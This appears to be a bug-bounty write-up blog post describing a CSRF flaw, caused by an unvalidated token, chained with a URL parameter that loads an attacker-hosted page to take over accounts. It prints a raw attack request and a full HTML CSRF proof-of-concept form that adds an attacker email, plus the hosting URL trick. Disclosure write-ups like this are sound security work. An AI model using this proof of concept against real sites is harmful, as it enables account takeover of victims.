Cross Site Request Forgery Critical Exploitable IN Infected Site?

Hello again

In One Private Program In Hackerone

Have Found Cross Site Request Forgery Vulnerability But not the usual

I Have Turn IT Critical CSRF Mixed With

HTTP PARRAMETER PULLUTION

Lets TO Write How It?🤔

In this request To Add Another User To Account To Obtain Permission to Access The victim’s Account

POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1

ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D

Okay What’s the problem here The CSRF Token Its Without Any Validation

Image for post
Image for post

User is now added

Image for post
Image for post

Okay Its Was Easily CSRF What Now Create A

CSRF PoC Sure

<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://x.website.infected/settings/users" method=”POST”>
<input type=”hidden” name=”ThisAction” value=”AddUser” />
<input type=”hidden” name=”NextAction” value=”Insert” />
<input type=”hidden” name=”new&#95;user&#95;email” value=”attackeremail&#64;evil&#46;com” />
<input type=”hidden” name=”first&#95;name” value=”mesbah” />
<input type=”hidden” name=”last&#95;name” value=”mesbah” />
<input type=”hidden” name=”phone” value=”01032764848" />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

But After Search In Proxy Http History Accidentally

I Found Parrameter Named URL In Site When I put anything, it is printed in the Response

Of course Test Cross Site Scripting But it didn’t work

It took me to think for a few minutes

I found that when I put another website in this parameter Example Of This Parrameter

https://x.website.infected/public/repositry?url=https://y.website.infected/

Okay Please Think With Me Now

I Get A Free Hosting Site And Upload File To Him

Now we will change the parameter from The Website Original To My 000webhost Website

https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html

Image for post
Image for post

Oh My God Its Worked At Website

What’s useful about that

Step 2 I Addedd JS Code With

window.onload Function To Submit Request

Now Its Full Account Takeover

By the infected site, not by the attacker

🤩🤩🤩🤩

Its More Good

And Wait For New WRITEUP By Me

vulnerability Reported

vulnerability Triagged

vulnerability :The site has not yet been paid😞😞😞😞

Good Bye

Written by

Web Penetration Tester Red Team Member Via Synack Worked As Huawei

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store